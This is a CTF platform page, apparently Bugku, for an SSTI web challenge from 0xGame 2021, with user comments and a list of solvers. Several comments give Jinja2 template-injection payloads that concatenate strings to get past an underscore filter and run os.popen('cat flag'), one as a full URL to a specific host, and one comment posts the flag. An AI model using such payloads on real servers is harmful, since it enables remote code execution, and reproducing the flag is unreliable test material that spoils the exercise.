sstiWEB 未解决

分数: 0 金币: 0
所属赛事: 0xGame 2021
题目作者: 未知
一  血: Lamb
一血奖励: 0金币
解  决: 92
提  示:
描  述:
0xGame{}
评论
yaozhiwang 6月前

0xGame{fl4sk_sst1_ju5t_5o_s0,r1ght?}

回复 0

xiaobai568 11月前

wp可参考https://ctf.bugku.com/writeup/detail/id/1203.html

回复 0

WCRH 11月前

首先无脑尝试几个语句,很容易发现__被过滤,那就字符串拼接(其实还有class被过滤,这个比较难发现,只能一个个尝试)

回复 0

单手压FL 1年前

search={{url_for['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}

回复 0

jz1111 1年前

http://82.157.146.43:18893/?search={{config['_'+'_'+'c'+'l'+'a'+'s'+'s'+'_'+'_']['_'+'_'+'init'+'_'+'_']['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}

回复 1

2728462336 1年前

爆出传参search,利用字符串拼接绕过

回复 0

WriteUp

暂无相关WriteUp

评分(0)

暂无评分

解题动态

kaiyafanfan123 攻破了该题 1天前
kingmaster123 攻破了该题 8天前
梦游的小狐狸 攻破了该题 11天前
forces 攻破了该题 25天前
yuloong 攻破了该题 1月前
蟹堡王第一厨师长 攻破了该题 1月前
花落时相遇 攻破了该题 1月前
19189756057 攻破了该题 2月前
下雨天y 攻破了该题 2月前
minshenyao 攻破了该题 2月前
dir_tree 攻破了该题 2月前
pancras 攻破了该题 2月前
ckasdfg 攻破了该题 2月前
Linyuan0624 攻破了该题 3月前
yixcjy 攻破了该题 3月前
fnuafhioun 攻破了该题 3月前
111lsg 攻破了该题 4月前
倦鸟叫了一整天 攻破了该题 4月前
tianna 攻破了该题 4月前
littlebear4 攻破了该题 4月前
问题反馈